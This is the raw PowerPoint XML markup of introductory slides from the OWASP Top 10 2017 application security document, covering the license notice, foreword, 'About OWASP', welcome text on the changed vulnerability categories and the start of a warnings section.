                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="48" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="42" idx="4"/>
                <a:endCxn id="47" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5650481" y="1263956"/>
                <a:ext cx="358867" cy="421"/>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44" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="39" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2188570" y="1263652"/>
                <a:ext cx="803350" cy="725"/>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7" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2991923" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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4" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>+F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>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29444" y="0"/>
            <a:ext cx="6887444" cy="914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dirty="0" smtClean="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>About OWASP</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443136841"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="354169">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Copyright and License</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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tr>
              <a:tr h="78883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t>Copyright © 2003 – 2017 The OWASP Foundation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t>This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="13716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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8517890"/>
            <a:ext cx="1046163" cy="374650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="617442562"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144986"/>
          <a:ext cx="3352800" cy="6779813"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="380488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Foreword</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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tr>
              <a:tr h="63993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t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly critical, complex, and connected, the difficulty of achieving application security increases exponentially. The rapid pace of modern software development processes makes risks even more critical to discover quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.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t>The goal of the Top 10 project is to raise </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>awareness</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>many more</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. The OWASP Top 10 was first released in 2003, with minor updates in 2004 and 2007. The 2010 version was revamped to prioritize by risk, not just prevalence, and this pattern was continued in 2013 and this latest 2017 release.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t>We encourage you to use the Top 10 to get your organization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>started</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications and APIs create in their enterprise. </a:t>
                      </a:r>
                    </a:p>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000" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>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t>In the long term, we encourage you to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes, and you should avoid attempting to do everything prescribed in some process model. Instead, leverage your organization’s existing strengths to do and measure what works for you.</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t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>owasp-topten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> or privately to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id=""/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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728320978"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="6781800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="382079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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tr>
              <a:tr h="63997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The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted.  At OWASP you’ll find</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>free and open </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> security tools and standards</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Complete books on application security testing, secure code development, and secure code review</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Standard security controls and libraries</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Local</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> chapters worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Cutting edge research</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Extensive conferences worldwide</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Mailing lists</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these areas.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OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>source software projects, OWASP produces many types of materials in a collaborative, open way.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The OWASP Foundation is the non-profit entity that ensures the project’s long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Chapter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Leaders, Project Leaders, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>project members. We support innovative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> security research with grants and infrastructure.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Come join us!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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564568520"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="2453640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Welcome</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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tr>
              <a:tr h="197110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Welcome to the OWASP Top 10 2017! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>This major update adds two new vulnerability categories for the first time: (1) Insufficient Attack Detection and Prevention </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>and (2) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Underprotected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>PIs. We made room for these two new categories by merging the two access control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>categories</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (2013-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A4 and 2013-A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) back into Broken Access Control (which is what they were called in the OWASP Top 10 - 2004), and dropping 2013-A10: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Redirects and Forwards, which was added to the Top 10 in 2010.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t>The OWASP Top 10 for 2017 is based primarily on 11 large datasets from firms that specialize in application security, including 8 consulting companies and 3 product vendors. This data spans vulnerabilities gathered from hundreds of organizations and over 50,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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109073332"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3657601"/>
          <a:ext cx="3352800" cy="5486399"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344420">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Warnings</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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tr>
              <a:tr h="51419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7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smtClean="0"/>
                        <a:t>Don’t stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. These are</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>essential reading for anyone developing web applications and APIs. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
